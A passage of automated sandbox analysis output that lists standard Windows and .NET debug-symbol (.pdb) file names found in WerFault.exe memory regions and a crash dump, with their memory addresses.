          Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: gpapi.pdbG source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: anagement.pdb&& source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: onfiguration.Install.pdbLL source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: atl.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: MpOAV.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb\ source: WerFault.exe, 0000000D.00000003.738499813.00000000052BD000.00000004.00000001.sdmp
          Source: Binary string: onfiguration.Install.pdb source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.DirectoryServices.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb@ source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb""F` source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb4 source: WER4735.tmp.dmp.13.dr
          Source: Binary string: clrjit.pdb9 source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Configuration.Install.pdbH source: WER4735.tmp.dmp.13.dr
          Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: ore.pdb{{ source: WerFault.exe, 0000000D.00000003.740241261.00000000052C0000.00000004.00000001.sdmp
          Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: System.Transactions.pdb% source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Configuration.Install.pdbx source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp
          Source: Binary string: System.Management.Automation.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: mscorlib.pdb source: WER4735.tmp.dmp.13.dr
          Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbf source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.739523880.0000000005284000.00000004.00000001.sdmp
          Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.738072111.00000000052A1000.00000004.00000001.sdmp
          Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER4735.tmp.dmp.13.dr
          Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: powershell.pdb source: WerFault.exe, 0000000D.00000003.741455991.0000000005270000.00000004.00000040.sdmp
          Source: Binary string: winhttp.pdbo source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.00000004.00000001.sdmp
          Source: Binary string: version.pdb/ source: WerFault.exe, 0000000D.00000003.738348119.000000000527B000.00000004.00000040.sdmp
          Source: Binary string: System.Xml.ni.pdbRSDS source: WER4735.tmp.dmp.13.dr
          Source: Binary string: System.Numerics.pdb source: WerFault.exe, 0000000D.00000003.727793944.0000000006210000.00000004.00000001.sdmp, WER4735.tmp.dmp.13.dr
          Source: Binary string: t.PowerShell.ConsoleHost.pdb" source: WerFault.exe, 0000000D.00000003.738761846.00000000052A6000.00000004.00000001.sdmp
          Source: Binary string: wininet.pdb source: WerFault.exe, 0000000D.00000003.739556026.0000000005288000.0